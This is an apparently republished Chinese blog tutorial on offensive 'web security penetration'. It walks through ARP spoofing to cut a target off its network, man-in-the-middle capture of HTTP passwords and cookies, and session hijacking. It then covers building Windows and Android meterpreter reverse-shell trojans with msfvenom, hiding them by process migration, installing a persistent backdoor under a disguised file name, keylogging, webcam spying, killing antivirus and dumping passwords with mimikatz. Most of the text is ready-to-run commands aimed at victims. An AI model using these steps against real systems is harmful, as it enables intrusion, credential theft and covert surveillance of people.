日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Web安全渗透

發布時間:2023/12/13 编程问答 21 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Web安全渗透 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1. 局域網斷網攻擊

wins下

ipconfig

查看主機網絡IP。

在vmware下

ifconfig

獲取當前虛擬機網卡,可能是eth0

fping -asg 172.20.12.254/24

獲取局域網網關中的所有主機,網關為172.20.12.254

arpspoof -i eth0(網卡) -t 192.168.1.10(目標主機的IP) 192.168.1.1(目標主機所在的網關)arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

這樣就可以使得Ip為192.168.1.10,網關為192.168.1.1,無法連網。

原理:流量劫持
正常上網:上網—》網關—》外網
上網—》劫持機的網卡(所有的流量都經過我)—》不轉發到外網,導致斷網

2. 流量劫持,并轉發到外網,這樣可查看所有會話,中間人攻擊

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

工具:arpspoof –>流量欺騙
ctrl + shift + t,新打開一個終端,輸入

driftnet -i eth0

可以查看圖經過網卡所有的圖片信息,這樣就能查看 IP192.168.1.10所瀏覽的圖片,但其仍然可以上網。

3. http賬號密碼獲取

首先流量欺騙

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

其次,抓包
ctrl + shift + t,新打開一個終端,輸入

ettercap -Tq -i eth0

工具:ettercap抓取網絡當中傳送的數據包,-T代表文本模式,q代表安靜模式。

這樣就可以捕獲到 IP192.168.1.10登陸到的所有http網頁下的賬號和密碼。

4.局域網內Session會話劫持

Session,通俗的講,瀏覽器 打開–》關閉這個期間是一個會話。
在同一個局域網當中,登錄別人的百度貼吧等。

首先,流量轉發,流量欺騙

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

其次,捕獲數據

ctrl + shift + t,新打開一個終端,輸入

tcpdump -i eth0 -w test.cap

用來捕獲數據。w寫入,tcpdump抓去打到本地的數據包。

最后,解析數據

ctrl + shift + t,新打開一個終端,輸入

ferret -r test.cap

下面需要設置瀏覽器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接著進入下一步,模擬受害者登陸
ctrl + shift + t,新打開一個終端,輸入

hamster

再接著進入瀏覽器,輸入 127.0.0.1:1234
就可以看到所有的cookies
點擊cookies就可以模擬受害者登陸。

工具:用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 進行ARP欺騙 tcpdump抓去打到本地的數據包 Ferret用來處理抓下來的數據包的 Hamster跟ferret配合使用,提供一個web服務來讓我們交互控制。

整個流程可見

開始arp欺騙 命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 捕獲數據包 命令:tcpdump -i eth0 -w cookie.cap 模擬受害者登錄 受害者在受害機器上就隨便刷新一下或者登錄一下 完畢下面我們開始重點 處理抓去的數據包ferret -r cookie.cap 自動生成了 hamster.txt 記得設置瀏覽器代理: 開啟hamster服務 打開hamster 瀏覽器輸入http://127.0.0.1:1234

5.生成木門

攻擊端:
OS:Kali
IP:192.168.1.104

被害端:
OS:Windows (64位)
IP:192.168.1.10

metaspolit framework
msf利器!
如何生成木門

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=55555 -f exe -o muma.exe

LHOST 為虛擬機的IP,LPORT為虛擬機的端口,我們是用虛擬機作為攻擊機。
ctrl + shift +t , 重新打開一個端口
輸入

msfconsole #控制臺 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 虛擬機IP set LPORT 55555 #55555為虛擬機端口 exploit

下面開始尋找肉機,只要別人打開這個muma.exe,就會成功找到。

別人必須打開這個 .exe 文件?如何讓別人打開?360 直接就能屏蔽?
監聽鍵盤,輸入的是漢語,監聽輸出的是英文,這是以為監聽鍵盤僅僅只是監聽鍵盤的輸入字符。

幫助菜單

meterpreter > ?

轉移 meterpreter到其他進程
(轉移的目的是為了防止被攻擊人查看進程管理器,殺死不明進程,一般轉移到屏幕桌面進程explorer.exe,只要屏幕不關閉,metersploit進程就不關閉)

meterpreter > getuid // 查看當前權限 meterpreter > ps // 列出當前權限

將木馬文件test.exe 的進程pid遷移到 PID為2044的explorer的進程

meterpreter > migrate 2044

驗證

meterpreter > ps

查看可知,test.exe進程已經沒有了。需要注意的是如果存在殺軟的話可能會阻止進程注入

安裝后門 metsvc
(安裝后門的目的是為了進行開機自啟動,修改注冊表之類的,讓木馬能長久的存活,一般把木馬test.exe 文件 改成qqconfig.exe之類的偽裝名,肉機就不敢刪除。)

meterpreter > run metsvc

metsvc后門安裝成功,接下來是連接
ctrl + shift +t , 重新打開一個端口

msfconsolemsf > use multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcpmsf exploit(handler) > show optionsmsf exploit(handler) > set RHOST 192.168.1.10 msf exploit(handler) > set LPORT 31337 msf exploit(handler) > exploit

其中 RHOST 為肉機的IP, 端口設置為metsvc所創建的端口

查看肉機的系統

meterpreter > sysinfo

獲取作為運行服務器的用戶

getuid

盡可能獲取盡可能多的特權

getprivs

獲得系統管理員權限

getsystem

獲取目標主機的圖形界面(VNC)

meterpreter > run vnc

查看屏幕

meterpreter > keyscan_start #啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件 meterpreter > keyscan_dump #鍵盤記錄軟件的內容轉儲 meterpreter >keyscan_stop #停止鍵盤記錄軟件

抓去 meterpreter 桌面的屏幕截圖

screenshot

控制攝像頭

meterpreter > webcam_stream

控制鼠標
uictl -啟用用戶界面組件的一些控件

meterpreter > uictl disable mouse #鼠標失效 meterpreter > uictl enable mouse #

查看當前進程

ps

重新打開連接

meterpreter > rerun

查看目標主機都采用了那些防護措施,列出幫助菜單,關閉防火墻以及其它我們發現的防護措施:

meterpreter >run getcountermeasure meterpreter >run getcountermeasuer -h meterpreter >run getcountermeasuer -d -k

killav腳本來殺死目標主機運行的殺毒軟件

meterpreter > run killav

識別被控制的主機是否是一臺虛擬機

meterpreter >run checkvm

在一個meterpreter會話界面中使用cmd shell

meterpreter >shell

獲取密碼

法國神器mimikatz可以直接獲得操作系統的明文密碼,meterpreter添加了這個模塊。
首先加載mimikatz模塊。
由于我的Windows 2008是64位的,所以先要轉移到64位進程。

meterpreter > ps meterpreter > migrate 2780

pid 2780 為64位進程 winlogon.exe

meterpreter > load mimikatz

獲取密碼哈希

meterpreter > msv

獲取明文密碼

meterpreter > kerberos

參考主頁
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html


待學習的網頁
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html


6.滲透安卓 Android

生成木馬

msfvenom -p android/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT= 55555 R > test.apk

ctrl + shift + t 打開另外一個終端

msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 虛擬機IP set LPORT 55555 exploit

更多細節可查看
http://www.myexception.cn/android/2023190.html

7.繼續

總結

以上是生活随笔為你收集整理的Web安全渗透的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。